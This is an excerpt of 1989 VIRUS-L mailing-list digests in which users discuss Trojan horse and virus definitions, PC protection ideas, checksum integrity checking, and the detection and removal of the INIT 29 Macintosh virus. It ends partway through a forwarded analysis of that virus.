  11882. Virus Prevention Guidelines
  11883.  
  11884. ---------------------------------------------------------------------------
  11885.  
  11886. Date:       Thu, 26 Jan 89 15:02:51 GMT
  11887. From:       Martin Ward <martin@EASBY.DURHAM.AC.UK>
  11888. Subject:    PC hardware protection (PC)
  11889.  
  11890. I have been considering the problem of trying to add some protection
  11891. against Trojan Horse (and by implication virus-infected) programs to a
  11892. PC. With a standard PC there appears to be NO protection against a
  11893. malicious Trojan which lies dormant for a while (ie carries out its
  11894. advertised function) and suddenly decides to trash all your file (or
  11895. just change a random byte in a random file). This is because any
  11896. program has total access to any bit of the hardware. Hence the only
  11897. protection is a regular backup (the Trojan which randomly changes
  11898. small areas of data could still take a while to find and therefore
  11899. could do a lot of damage).
  11900.  
  11901. Other operating systems (eg UNIX) have protection mechanisms which
  11902. (barring loopholes) prevent a user from accessing or modifying files
  11903. he does not have permission for. This could be extended to the concept
  11904. of "program" permissions: when an untrusted program is about to be run
  11905. a trusted supervisor program gives write permission to only those
  11906. files the untrusted program is allowed access to and then runs the
  11907. program under that user id.
  11908.  
  11909. To implement this system on a PC requires extra hardware, (here is
  11910. where I need some help from someone with more knowledge of PC
  11911. hardware): I imagine a two-position switch (physical, hardware
  11912. switch). In one position it allows full access to the disk and to an
  11913. internal "permissions" table. In the other position it denies access
  11914. to the "permissions" table and prevents access to any files not listed
  11915. in the table. Moving the switch from the second to the first position
  11916. should cause an automatic cold boot (this is so that a malicious
  11917. program cannot "pretend" it has terminated and fool you into moving
  11918. the switch). To execute an untrusted program you run a trusted program
  11919. which looks up the files allocated to the untrusted program (in a
  11920. file), sets up the permissions table and requests that you throw the
  11921. switch.  It then waits for the switch to be moved and automatically
  11922. runs the program.
  11923.  
  11924. No "untrusted" program should have access to the boot tracks,
  11925. command.com files etc. or any executables, and should not be able to
  11926. create "bad" sectors.  Hence the cold boot which occurs when the
  11927. switch is moved back to the "trusted program" position should be
  11928. perfectly safe.
  11929.  
  11930. Comments on the practicality etc. of this idea are welcomed!
  11931.  
  11932.             Martin.
  11933.  
  11934. My ARPANET address is:  martin%EASBY.DUR.AC.UK@CUNYVM.CUNY.EDU
  11935. JANET: martin@uk.ac.dur.easby    BITNET: martin%dur.easby@ac.uk
  11936. UUCP:  ...!mcvax!ukc!easby!martin
  11937. Quote: "If God had intended Man to Smoke, He would have set him on Fire."
  11938.  
  11939. ------------------------------
  11940.  
  11941. Date: 26 January 1989, 10:07:43 EST
  11942. From: David M. Chess <CHESS@YKTVMV.BITNET>
  11943. Subject:  re: Request for definition of worms and trojan horses.
  11944.  
  11945. Well, the definitions we tend to use around here are something like this:
  11946.  
  11947.   A bug is something that a program does that neither the programmer
  11948.   nor the user intended.
  11949.  
  11950.   A Trojan horse is a program that does something that the programmer
  11951.   intended it to, but the user did not.  (And, generally, that the
  11952.   user would not have approved of had he/she known about it.)
  11953.  
  11954.   A worm is a program that sends copies of itself through a network.
  11955.  
  11956.   A virus is, to quote Fred Cohen, "a program that can 'infect' other
  11957.   programs by modifying them to include a possibly evolved copy of itself".
  11958.  
  11959. A program infected with a virus is usually a Trojan horse, since it
  11960. does at least one thing (infecting other programs) that the user
  11961. doesn't know about, and wouldn't approve of.   The (a?) key difference
  11962. between a worm and a virus is that a virus is a code-fragment that
  11963. hides within and spreads between *programs*, whereas a worm is a complete
  11964. program (or program-set) that runs on and spreads between network-
  11965. attached *computers*.  In a very deep theoretical sense, the two are
  11966. different versions of the same thing (instructions that make copies
  11967. of themselves at other places in a computing environment); but in
  11968. practice, a program is different enough from a network-attached system
  11969. that it makes sense to draw a distinction.
  11970.  
  11971. The Internet thing back in November was a worm, not a virus.  A
  11972. copy of Pandas in Space that has been hacked to include code that
  11973. erases all your files (but doesn't spread to other programs) is a
  11974. Trojan horse, but not a virus or a worm.
  11975.  
  11976. Something like that...
  11977.  
  11978. DC
  11979.  
  11980. [Ed. Thank you for the clear definitions.  I received a plethora of
  11981. similar definitions of virus/worm/trojan today; thanks to *everyone*
  11982. who took the time to send in theirs!  I've included (only) this one
  11983. here, not because it's any better (or worse) necessarily, but to cut
  11984. down on redundancy/traffic.
  11985.  
  11986. J.D. Abolins made a very interesting point in the definition that he
  11987. sent in: "Tom Kummer, in a recent posting, asked what is the
  11988. difference between Trojan Horse program and worms as compared to
  11989. viruses.  Before I post an off-the-cuff reply, I must mention that the
  11990. terminology for 'bogusware' is very fluid.  The use of any word such as
  11991. virus, worm, etc. has to be interpreted in the context of the person
  11992. using the word and the actual workings of the program in question.
  11993. 'One man's virus is another man's worm.'"  This points out the fact
  11994. that there is much confusion (particularly in the media) as to the
  11995. meaning of the above terms.  We must try to take such reports with a
  11996. grain of salt, and figure out for ourselves what the author meant.
  11997. The media still refers to the Internet Worm as the "Internet Virus"...]
  11998.  
  11999. ------------------------------
  12000.  
  12001. Date:         Thu, 26 Jan 89 11:16:09 EST
  12002. From:         Joe McMahon <XRJDM@SCFVM.GSFC.NASA.GOV>
  12003. Subject:      Re: [LICHTBLS@DUVM.BITNET: nVir (init 29) (Mac)]
  12004.  
  12005. >Subject:      nVir (init 29) (Mac)
  12006. >
  12007. >  I have encountered this new strain of nVir on a bunch of Mac II's
  12008. >with Interferon, but have not been able to successfully eradicate the
  12009. >infection.  Also Ferret, VirusRx, and virus detective are not able to
  12010. >identify this virus.  The virus also shows up as a code segment ID 255
  12011. >or 256 which is 712 bytes long as previously noted.  What is the best
  12012. >way to eradicate this "thing"?  Is this new strain of any potential
  12013. >danger to documents saved on a different disk or will it just cause
  12014. >memory problems when the infected machine is used?
  12015.  
  12016. The INIT 29 virus is not a strain of nVIR. It is much more dangerous.
  12017.  
  12018. INIT 29 is far more infective than any Mac virus yet known. It gets
  12019. into *EVERYTHING*. Documents, font (suitcase) files, printer drivers,
  12020. the Desk Top file (the real one!); just about everything except (for
  12021. some reason) MacPaint files.
  12022.  
  12023. When an infected program is run on a clean system, the INIT gets
  12024. installed into the System file. When an infected program is merely
  12025. COPIED TO A DISK, the Desk Top file gets infected.
  12026.  
  12027. Next boot, it infects every file with a resource fork that gets opened
  12028. during the work session. *Inserting* a disk into an infected system
  12029. will infect its Desk Top file, unless it is locked. If it is locked,
  12030. you will get the "Disk needs minor repairs" dialog. DON'T FALL FOR IT!
  12031. This is caused by the I/O error caused by the virus being unable to
  12032. infect the Desk Top file. Unlocking the disk and reinserting it will
  12033. get you.
  12034.  
  12035. It patches itself into applications, adding a new CODE segment with an
  12036. ID 1 larger than the highest-numbered CODE resource. Bytes 9, 10, 11,
  12037. and 12 of CODE 0 are patched to point to the virus; these bytes are
  12038. moved to bytes 16, 17, 18 and 19 of the virus. For some reason,
  12039. multiple copies of the virus get copied into some applications.
  12040.  
  12041. The only application which can clean up infected *documents* (not
  12042. applications) is VirusDetective(tm) 2.0. It is already configured to
  12043. do so. Use its "delete infection" option to erase the INIT 29
  12044. resource. Applications should be replaced from clean copies. You might
  12045. try using the patch information noted above for irreplaceable
  12046. applications.
  12047.  
  12048. This is a very, very nasty virus. BE CAREFUL! GateKeeper should
  12049. probably be able to stop it; I don't think Vaccine is totally
  12050. resistant to it.
  12051.  
  12052. Virus Detective 1.2 does not dependably remove the infection: it does
  12053. not deal properly with locked resources, whereas the virus DOES. It
  12054. may tell you that it has deleted the infection, when it has done no
  12055. such thing.
  12056.  
  12057.  --- Joe M.
  12058.  
  12059. ------------------------------
  12060.  
  12061. Date: Thu, 26 Jan 89 13:12 EST
  12062. From: Roman Olynyk - Information Services <CC011054@WVNVMS.BITNET>
  12063. Subject: Virus Prevention Guidelines
  12064.  
  12065. Computer World (Jan. 9) had a article which referenced virus prevention
  12066. guidelines:
  12067.    "Del Jones, managing director of the National LAN Laboratory in
  12068.    Reston, VA., has issued a set of guidelines on virus prevention
  12069.    and control endorsed by about 70 manufacturers."
  12070. A subsequent reference to another CW article didn't discuss these
  12071. guidelines.
  12072.  
  12073. Can anyone help me get a handle on these guidelines or where I might
  12074. actually find them?
  12075.  
  12076. ------------------------------
  12077.  
  12078. End of VIRUS-L Digest
  12079. *********************VIRUS-L Digest              Friday, 27 Jan 1989         Volume 2 : Issue 28
  12080.  
  12081. Today's Topics:
  12082. re: init 29 virus (Mac)
  12083. Mac Virus?
  12084. checksum protection
  12085. National LAN Laboratory
  12086.  
  12087. ---------------------------------------------------------------------------
  12088.  
  12089. Date:     Thu, 26 Jan 89 22:47 GMT
  12090. From:     <SEKRETAR@CZHETH5A.BITNET>
  12091. Subject:  re: init 29 virus (Mac)
  12092.  
  12093. The 'INIT 29" virus is not a mutation of nVIR, even if it is very
  12094. similar. Its sole purpose is to replicate itself. Other than that, it
  12095. causes no harm to the system. However, it will copy itself to *every*
  12096. resource fork that has been opened by the System, an application or a
  12097. utility (CDEV, DA, etc). I'd classify it as extremely virulent.
  12098.  
  12099. Symptoms are an INIT resource with ID 29 and a size of 712 bytes.
  12100. Infected applications also have an additional CODE resource of the
  12101. same size. If you open the application with ResEdit, the viral
  12102. resource will be on top of the list of CODE resources.
  12103.  
  12104. As it patches the code jump table, removing the INIT and the CODE
  12105. resources without restoring the table will cause your application to
  12106. crash.
  12107.  
  12108. The latest version of VirusDetective (2.0) will detect this virus. It
  12109. will not repair an infected application, as it does not restore the
  12110. jump table. The next version of AntiPan will probably be able to
  12111. detect and remove it.
  12112.  
  12113. In any case, I suggest you to trash the infected applications and
  12114. system files. Other infected resource files (those who do not contain
  12115. CODE resources) may be repaired by removing the INIT 29 resource.
  12116.  
  12117. - -- Danny Schwendener
  12118.    ETH Macintosh Support
  12119.    macman@czheth5a.bitnet   macman@ethz.uucp   macman@ifi.ethz.ch
  12120.  
  12121. ------------------------------
  12122.  
  12123. Date: Thu, 26 Jan 89 17:41 EST
  12124. From: CNSM CCR - Rob Rothkopf <MASROB@UBVMS.BITNET>
  12125. Subject: Mac Virus?
  12126.  
  12127. I have a MAC-SE that I *thought* was eradicated from all viruses
  12128. (virii pl?).  It seemed free of nVIR and SCORES and all the others and
  12129. yet the system crashes periodically and I need to reload it from the
  12130. original.
  12131.  
  12132. Any advice?
  12133.                                         --Rob Rothkopf
  12134.  
  12135. ------------------------------
  12136.  
  12137. Date: Thu, 26 Jan 89 17:34:54 EST
  12138. From: Don Alvarez <boomer@space.mit.edu>
  12139. Subject: checksum protection
  12140.  
  12141. David M. Chess made a pretty convincing argument in the last issue
  12142. that he can absolutely trust his checksum if he keeps the checksummer
  12143. on a floppy disk which is locked away and never inserted into a
  12144. machine that hasn't just had a warm boot.
  12145.  
  12146. I will agree with him that he can trust his checksummer, but unless he
  12147. can checksum every file on my hard disk in under one minute its a cure
  12148. that's worse than the disease (just add up how long you would spend
  12149. doing checksums in a year and compare that against your expected rate
  12150. of infection).  Also, suppose I have five hundred files on my disk.
  12151. How am I going to know what the checksum for each of them should be?
  12152. Keep a list of checksums on my disk?
  12153.  
  12154. This shut-the-machine-off, boot-from-floppy, run-checksum, put-floppy-
  12155. away and switch-over-to-hard-disk routine sounds like a lot of work to
  12156. do every time I want to run my word processor.  Its a whole lot worse
  12157. if you want to do it not to an isolated PC but to a networked
  12158. workstation.
  12159.  
  12160. Also, what does the checksum program tell me?  It tells me that
  12161. someone has destroyed my data.  It doesn't tell me when and it doesn't
  12162. tell me what to do to get it back.  I still have to keep backups of
  12163. everything.
  12164.  
  12165. Checksums are good for checking the integrity of data if you have
  12166. reason to believe that it has been corrupted (ie did I just download a
  12167. bogus copy of VirusRX off the network).  They are not a good way to
  12168. handle everyday protection against viruses (consider the couple that
  12169. tries to practice birth control by spending ten minutes every morning
  12170. giving the woman a pregnancy test).
  12171.  
  12172. Add up how much time you personally expect to loose in a year from
  12173. data lost to viruses.  Any "cure" that takes up more of your time in a
  12174. year than you expect to loose is quite litterally "wasting your time."
  12175.  
  12176. Nobody spends $20,000 a year to insure a $10,000 car.  Even fewer
  12177. people spend $20,000 a year for a service that merely tells them
  12178. whether someone has already stolen their $10,000 car.
  12179.  
  12180.                     -Don Alvarez
  12181.  
  12182. ------------------------------
  12183.  
  12184. Date:     Thu, 26 Jan 89 20:10 EST
  12185. From:     <ACS045@GMUVAX.BITNET>
  12186. Subject:  National LAN Laboratory
  12187.  
  12188. Roman Olynyk <CC011054@WVNVMS.BITNET> writes:
  12189. >Computer World (Jan. 9) had a article which referenced virus prevention
  12190. >guidelines:
  12191. >   "Del Jones, managing director of the National LAN Laboratory in
  12192. >   Reston, VA., has issued a set of guidelines on virus prevention
  12193. >   and control endorsed by about 70 manufacturers."
  12194. >A subsequent reference to another CW article didn't discuss these
  12195. >guidelines.
  12196. >
  12197. >Can anyone help me get a handle on these guidelines or where I might
  12198. >actually find them?
  12199.  
  12200. Roman,
  12201. I happen to live in Reston, and although I've never heard of the
  12202. place, chances are that its only about 5 or 10 minutes from my house.
  12203. If you could get me an exact address or something I'd be glad to pop
  12204. over there someday and try and scare up a copy.
  12205. - ---Steve
  12206. - ----------------
  12207. Steve Okay  ACS045@GMUVAX.BITNET/acs045@gmuvax2gmu.edu/CSR032 on The Source
  12208.  
  12209. "These comments are less relevant than say, The New York Times OP-ED
  12210.  Page, but more relevant than say, Plywood"
  12211.                          ----Bloom County
  12212.  
  12213. ------------------------------
  12214.  
  12215. End of VIRUS-L Digest
  12216. *********************VIRUS-L Digest              Friday, 27 Jan 1989         Volume 2 : Issue 29
  12217.  
  12218. Today's Topics:
  12219. Re: [MASROB@UBVMS.BITNET: Mac Virus?]
  12220. Why "virus"? (longish)
  12221.  
  12222. ---------------------------------------------------------------------------
  12223.  
  12224. Date:         Fri, 27 Jan 89 10:13:54 EST
  12225. From:         Joe McMahon <XRJDM@SCFVM.GSFC.NASA.GOV>
  12226. Subject:      Re: [MASROB@UBVMS.BITNET: Mac Virus?]
  12227.  
  12228. >From: CNSM CCR - Rob Rothkopf <MASROB@UBVMS.BITNET>
  12229. >
  12230. >I have a MAC-SE that I *thought* was eradicated from all viruses
  12231. >(virii pl?).  It seemed free of nVIR and SCORES and all the others and
  12232. >yet the system crashes periodically and I need to reload it from the
  12233. >original.
  12234. >Any advice?
  12235.  
  12236. Rob, I've sent you VirusDetective(tm) 2.0. Try it against your System
  12237. and see if you get any hits. If not, what INITs and CDEVs are you
  12238. using?  You may have a conflict unrelated to any virus at all.
  12239.  
  12240. - --- Joe M.
  12241.  
  12242. ------------------------------
  12243.  
  12244. Date:         Wed, 25 Jan 89 09:18:32 EST
  12245. From:         Steve Cavrak <SJC@UVMVM.BITNET>
  12246. Subject:      Why "virus"? (longish)
  12247.  
  12248. The following was grabbed from "comp.sys.misc" over usenet this
  12249. morning.  I heard the broadcast and had similar concerns.  The first
  12250. part is William's LeFebvre's posting; the second is my reply
  12251. (hopefully follow-up, but usenews is still somewhat of a mystery to
  12252. me.)  Perhaps the concerns are of broader interest and might make
  12253. worthwhile reading in virus-l ?  (I've edited the headers and tab
  12254. characters out for my IBM account ...)
  12255.  
  12256. - ----------------------- Original Message ------------------------
  12257.  
  12258. From: phil@titan.rice.edu (William LeFebvre)
  12259.  
  12260. I heard someone on the news today more or less state that computer
  12261. viruses were a very recent thing (within the last 5 years).  I have a
  12262. very strong feeling that this is wrong.  Can anyone tell me when the
  12263. term "virus" was first used in the context of computers?  Can you give
  12264. me references?
  12265.  
  12266. In an interview on NPR's "All Things Considered", this author, Susan
  12267. Sontag (sp?), was trying to point out how America currently has an
  12268. obsession with medical diseases, given the current AIDS problem.  She
  12269. pointed to the usage of the term "computer virus" as one indication of
  12270. this.  She went on to say that if this type of computer activity had
  12271. happened 5 or 10 years ago, it would have been called something else.
  12272.  
  12273. Anyone got any refuting information?  Anyone also hear the interview
  12274. and think that I'm off base or that I misheard her?
  12275.  
  12276.    William LeFebvre
  12277.    Department of Computer Science
  12278.    Rice University
  12279.    <phil@Rice.edu>
  12280.  
  12281. - --------
  12282. Follow up:
  12283. From:         Steve Cavrak <SJC@UVMVM.BITNET>
  12284.  
  12285. I heard the interview and share her reactions.
  12286.  
  12287. Sontag was being interviewed in relation to her new book "Aids as
  12288. Metaphor".  (Her book reviewed in either last Sunday's NYTimes Book
  12289. Review section or the week before, and which was excerpted a few
  12290. months back in the New York Review of Books.)  She has written an
  12291. earlier book called "Illness as Metaphor", written after her bout with
  12292. cancer.  Before that she wrote a book entitled "Beyond Interpretation"
  12293. - --- which grew in some part out of her role as a film critic for the
  12294. New Yorker.
  12295.  
  12296. One of her concerns is how our word choices drag along with them a lot
  12297. of cultural baggage.  This baggage, or connotation, sometimes creates
  12298. it own problems.  (Cf the "War on drugs", the "War on poverty",
  12299. "animal rights", etc.)  Why, she wondered, was Watergate a "cancer on
  12300. the presidency?"
  12301.  
  12302. The comment about computer virus was in this vein.  Why is a computer
  12303. virus called a "virus" (or why is "FORTRAN" called a programming
  12304. "language" if you want to desensitize the metaphor), rather than, for
  12305. example, a "parasite".  And how does this choice of metaphor affect
  12306. the way people understand what is happening around them.  And how does
  12307. this change when the virus in the news is HIV-IV rather than a mere
  12308. rhinovirus or tobacco mosiac virus.
  12309.  
  12310. (For that matter how do people understand "computers", but that is way
  12311. beyond this list?)
  12312.  
  12313. My own reaction to the interview was that simile, metaphor, and
  12314. allegory are not nicely separable.  A virus, and DNA in general, IS
  12315. LIKE a computer program (and almost vice versa, especially if you
  12316. accept William Burroughs comment that "Language is a virus".)
  12317. Certainly a computer virus IS more LIKE a virus than a computer worm
  12318. IS LIKE a real worm, or a computer trojan horse IS LIKE a real Trojan
  12319. horse.
  12320.  
  12321. Of course the original question of WHERE DO THESE WORDS COME FROM is
  12322. left unanswered.  I'm certainly interested in finding out.
  12323.  
  12324. Steve Cavrak
  12325. Academic Computing Services
  12326. University of Vermont
  12327.  
  12328. ------------------------------
  12329.  
  12330. End of VIRUS-L Digest
  12331. *********************VIRUS-L Digest             Wednesday, 4 Jan 1989         Volume 2 : Issue 3
  12332.  
  12333. Today's Topics:
  12334. Government Certification of Software
  12335. Bursting Digests on UNIX hosts
  12336.  
  12337. ---------------------------------------------------------------------------
  12338.  
  12339. Date:  Wed, 4 Jan 89 12:49 EST
  12340. From:  WHMurray@DOCKMASTER.ARPA
  12341. Subject:  Government Certification of Software
  12342.  
  12343. Stan Horowitz writes:
  12344.  
  12345. "A question of relevance to this discussion is along the following
  12346. lines.  Is it not the ethical responsibility of our government to
  12347. establish laws and guidelines which software must pass before being
  12348. distributed."
  12349.  
  12350. Bite your tongue!  Murray's first law of data security reads: "Be very
  12351. careful what you ask for; you might get it."
  12352.  
  12353. No body promised you a rose garden.  If you got it, you would likely
  12354. find it to be a cold and hungry place.  Those who believe that it is
  12355. the responsibility of government to provide us with a zero-risk world
  12356. would do well to think about the implications.  God protect me from
  12357. computer software provided by those wonderful people who who gave us
  12358. the Nuclear Regulatory Agency.
  12359.  
  12360. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  12361. 2000 National City Center Cleveland, Ohio 44114
  12362. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  12363.  
  12364. ------------------------------
  12365.  
  12366. Date: Wed, 04 Jan 89 06:43:43 -0800
  12367. From: Steve Goldstein <goldstei@nsipo.nasa.gov>
  12368. Subject: Bursting Digests on UNIX hosts
  12369.  
  12370. From time to time, the subject of mail digests comes up, as it does
  12371. often with BIG-LAN Digest.  Some folks, such as I, do not like to have
  12372. to read through the entire digest to get msgs of interest.
  12373. Fortunately, if you use MH-Mail (RAND's Mail Handling utility on UNIX
  12374. hosts), you can place the MH command "inc" (incorporate mail from the
  12375. system mail box into my inbox) in your login script, followed by the
  12376. command:
  12377.  
  12378.     burst `pick -subj "VIRUS-L Digest"` >& /dev/null
  12379.  
  12380. This looks for msgs with VIRUS-L Digest in the subject field and
  12381. bursts them into their constituent msgs.  Then, you can scan a message
  12382. list which identifies each component of the digest individually.
  12383.  
  12384. For those of you on UNIX machines who do not have MH (public domain),
  12385. consider kicking and screaming for it!
  12386.  
  12387. Regards to all,
  12388.  
  12389. Steve Goldstein
  12390.  
  12391. ------------------------------
  12392.  
  12393. End of VIRUS-L Digest
  12394. *********************VIRUS-L Digest              Monday, 30 Jan 1989         Volume 2 : Issue 30
  12395.  
  12396. Today's Topics:
  12397. re: checksum protection
  12398. Virus Terminology
  12399. A detailed description of the INIT 29 Macintosh Virus (Mac)
  12400. Apple Viruses? (NOT Mac)
  12401. FRG Nazi virus? Huh?
  12402.  
  12403. ---------------------------------------------------------------------------
  12404.  
  12405. Date: 27 January 1989, 13:27:00 EST
  12406. From: David M. Chess  <CHESS@YKTVMV.BITNET>
  12407. Subject: re: checksum protection
  12408.  
  12409. Don Alvarez <boomer@space.mit.edu> writes:
  12410.  
  12411. > Checksums are good for checking the integrity of data if you have
  12412. > reason to believe that it has been corrupted (ie did I just download a
  12413. > bogus copy of VirusRX off the network).  They are not a good way to
  12414. > handle everyday protection against viruses...
  12415.  
  12416. because, basically, it takes too long to run the checksum checks.
  12417.  
  12418. That's a matter of personal taste, I suppose.  I run a checksum
  12419. program that takes about ten minutes, every couple of days.  Of
  12420. course, if it really wasted ten minutes of *my* time, it wouldn't be
  12421. worth it.  But I always have ten minutes of stuff to do that doesn't
  12422. require the computer (reading journals, eating lunch, etc), and who
  12423. cares if I waste the *computer's* time?  With multi-tasking operating
  12424. systems becoming the norm, it'll be even less of a concern; just start
  12425. the checker running in the background with a low priority.
  12426.  
  12427. If checksums (and related modification-detection schemes) aren't a
  12428. good way to handle everyday protection against viruses, what is?  The
  12429. only alternatives seem to be to check for the N viruses that you
  12430. happen to have heard of (you'll still get bitten by virus N+1), or to
  12431. hope somebody else gets bitten by a new virus before you do, so you'll
  12432. be told about it.  Neither very satisfying!
  12433.  
  12434. The bit about rebooting the machine from a trusted floppy before
  12435. running the check is, of course, more of a pain than I'm willing to go
  12436. to.  I was just using it as an extreme example to argue against some
  12437. claims that, for theoretical reasons, undefeatable checking is
  12438. impossible.  I hope that future operating systems and technology will
  12439. make possible undefeatable checking that *is* human-useable.  May not
  12440. be soon, of course, but I just wanted to suggest that it was
  12441. theoretically possible.
  12442.  
  12443. DC
  12444.  
  12445. P.S.
  12446. > How am I going to know what the checksum for each of them should be?
  12447. > Keep a list of checksums on my disk?
  12448.  
  12449. Yes, of course.  On the same disk that the checker program is on.
  12450. Sorry I didn't make that clear.  The checksums that are stored are
  12451. just the ones the checker found last time.  The checker doesn't tell
  12452. you "this program is/isn't clean", just "this program is/isn't the
  12453. same as it looked last time I saw it".  Imperfect, perhaps, but I
  12454. haven't thought of anything really better...
  12455.  
  12456. ------------------------------
  12457.  
  12458. Date:         Fri, 27 Jan 89 11:32:46 PLT
  12459. From:         Joshua Yeidel <YEIDEL@WSUVM1.BITNET>
  12460. Subject:      Virus Terminology
  12461.  
  12462. In Virus-L V2 #28, Danny Schwendener writes:
  12463.  
  12464. < The 'INIT 29" virus is not a mutation of nVIR, even if it is very
  12465. < similar. Its sole purpose is to replicate itself. Other than that, it
  12466. < causes no harm to the system. However, it will copy itself to *every*
  12467. < resource fork that has been opened by the System, an application or a
  12468. < utility (CDEV, DA, etc). I'd classify it as extremely virulent.
  12469.  
  12470. This is not a flame, but just an attempt to clarify our terminology.
  12471. My "American Heritage" Dictionary defines "virulent" as "extremely
  12472. poiosonous or pathogenic".  I think we should reserve that word for
  12473. viruses, worms, Torjan horses, and other slime ("virus" in Latin)
  12474. which have known malignant effects.  In my opinion, the correct term
  12475. for INIT 29 is "extremely contagious", since it spreads through so
  12476. many mechanisms and so many infection sites (filetypes).
  12477.  
  12478. This may seem like a very small point of diction, but it is very
  12479. important to use accurate terms and avoid giving misimpressions when
  12480. conveying virus information to large numbers of people.  More damage
  12481. at our site has been caused by virus panic than by the malignant
  12482. effects of all viruses together.
  12483.  
  12484. By the same token, I would recommend against describing any virus as
  12485. "benign".  There is no way of ensuring that a virus will do no harm in
  12486. any hardware/system/application setting it might infect. This is
  12487. especially true since copies of a virus have no way of being updated
  12488. to reflect system software updates.  The "benign" virus of today might
  12489. become a "bomber" tomorrow.  In this sense (at least), every virus is
  12490. a threat.
  12491.  
  12492. - - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- -
  12493. Joshua Yeidel                         YEIDEL@WSUVM1.BITNET
  12494. Academic Computing Services           YEIDEL@WSUVMS1.WSU.EDU
  12495. Washington State University           (509) 335-0441
  12496. Pullman, WA 99164-1220
  12497. DISCLAIMER: I'm speaking solely for myself here, not Washington State U.
  12498. - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - -- - --
  12499.  
  12500. ------------------------------
  12501.  
  12502. Date:     Fri, 27 Jan 89 16:31 EST
  12503. From:     DEC P/N 90-09203-00, for all your baking needs. <JEN@VTCS1>
  12504. Subject:  A detailed description of the INIT 29 Macintosh Virus (Mac)
  12505.  
  12506. Here's a detailed analysis of the INIT 29 Macintosh Virus from Thomas
  12507. Bond.
  12508.  
  12509. - -Jeff E. Nelson
  12510. - -Virginia Polytechnic Institute and State University
  12511. - -INTERNET:  jen@vtcs1.cs.vt.edu
  12512. - -BITNET:    jen@vtcs1.bitnet
  12513.  
  12514. begin forwarded message------------------------------------------------
  12515.  
  12516. 0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
  12517.  
  12518. THE ELEVENTH WORD:
  12519.  
  12520. 0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
  12521.  
  12522. An Investigation Into the 712-byte RINIT 29S Macintosh Virus
  12523.  
  12524. by Thomas Bond, Mac Consultant
  12525. 11684 Ventura Blvd., #932  %  Studio City, CA 91604
  12526. 818-843-0567
  12527.  
  12528. (C) 1989 by Thomas Bond.  Permission is hereby granted to distribute in whole
  12529. part by any means, whether in print or electronic, as long as the name,
  12530. address and phone of the author remain unchanged.  Publications may quote
  12531. parts for use in education on computer virus problems.
  12532.  
  12533.      Code 0
  12534.        /
  12535.   Virus Segment
  12536.        \
  12537.       Application Segments
  12538.         /
  12539.       ????????
  12540.  
  12541. ACKNOWLEDGEMENTS: This research could not have been completed without
  12542. the very valuable help received from Q Tom Pitts, Robert Wright and
  12543. David Lagerson of the MacValley Macintosh Users Group, Mark Weems of
  12544. Kinko's Studio City store, Ken Cary of PaperWorks in Burbank, Joe
  12545. Niewe of California State University, Northridge, and many others who
  12546. gave up their time and advice.
  12547.  
  12548. [MacValley membership is $30.00 per year, and provides access to the
  12549. PD Library with 1000's of freeware and shareware programs, official
  12550. releases of Apple System software, association with over 700 Mac
  12551. users, and special presentations from software companies, covering new
  12552. programs and developments in the industry.  For membership info, call
  12553. Bob Campbell, 818-784-2666.]
  12554.  
  12555.  
  12556. BACKGROUND:
  12557.  
  12558.  This report is being prepared on January 17, 1989, for distribution
  12559. at the monthly meeting of MacValley Macintosh Users Group in Burbank,
  12560. California.  It contains the most recent information available to the
  12561. author at this time: How the new RINIT 29S 712 byte virus acts, how to
  12562. detect it, how to prevent it, and how to repair the damage it may do,
  12563. at least in the early stages of its infection.  Those who need
  12564. immediate help because they know or strongly suspect that their disks
  12565. or hard disk(s) are infected, please turn to the section below labeled
  12566. FOR EMERGENCY ACTION.  Others may benefit from a more deliberate
  12567. reading of this paper, learning how these kinds of viruses work and
  12568. what to do about them.
  12569.  
  12570. The author, Thomas Bond, is a Mac Consultant working primarily in
  12571. desktop publishing and graphics, for various companies in the San
  12572. Fernando Valley and Greater Los Angeles area.  He is available for
  12573. professional consultations regarding this or other Macintosh
  12574. applications and problems by calling the number above, 24 hours.
  12575.  
  12576. Late in December, 1988, one of my clients, the Kinko's Copy Center at
  12577. Fulton Boulevard & Burbank Boulevards in Van Nuys, reported an unusual
  12578. problem: It's three rental computers, all with hard disks attached,
  12579. were rejecting all locked disks inserted into them.  After unlocking
  12580. and reinserting the disks, documents would open normally.  Sometimes
  12581. documents created with several programs such as PageMaker 3.0,
  12582. MacWrite 5.01, Ready,Set,Go! 4.0a, Microsoft Word 3.02, Aldus Freehand
  12583. 2.0, Adobe Illustrator 88, and others, would fail to print.  The
  12584. report from the program was either that Rthis document failed to
  12585. printS or in some cases there would be a bomb, or no report at all,
  12586. simply a failure to print.  On occasion, the hard disk would fail to
  12587. boot properly.
  12588.  
  12589. Checks with Apple's Virus Rx 1.3 & later Virus Rx 1.4 showed only that
  12590. almost all applications, the System and Finder (v. 6.0.2) were
  12591. damaged.  Replacement of the damaged programs and system files was
  12592. performed repeatedly over a week's period.  In the meanwhile, hundreds
  12593. of customers used the machines and infected their diskettes.  In
  12594. between my own efforts, employees of the store often replaced the
  12595. system files and applications themselves, in an effort to fix the
  12596. problem.  The hard disks were initialized several times over several
  12597. days.  Never-the-less, the infection reappeared immediately each time,
  12598. soon after it began to be used.
  12599.  
  12600. A few days later, similar problems began to be reported at the Kinko's
  12601. Studio City store, on Ventura Boulevard near Laurel Canyon.  The same
  12602. procedures were followed at that store.  Some of the same well-meaning
  12603. but uninformed employees tried to solve the problem.  In spite of the
  12604. best efforts of several staff members and my own frequent visits, the
  12605. equipment failed to print roughly half the time.  Each store was
  12606. losing 100's of dollars due to the problem, adding to $1000's.
  12607.  
  12608. On Tuesday, January 3, I began to seriously and scientifically
  12609. investigate the nature of the problem.  Careful poking around in the
  12610. files with ResEdit 1.2b2 had already revealed no infestation of either
  12611. Scores or nVIR, with which we were sadly very familiar and expert at
  12612. handling.
  12613.  
  12614. Using ResEdit, I opened up a RcleanS and RdirtyS copy of Teach Text.
  12615. The infected copy was exactly 728 bytes larger than the clean one.
  12616. The CODE resource list showed ID's 0 thru 3 in the infected copy, and
  12617. 0 thru 2 in the clean copy.  The new resource, ID number 3, was
  12618. exactly 712 bytes.  The CODE resource numbered 0 was exactly 16 bytes
  12619. bigger in the dirty copy than the clean copy.
  12620.  
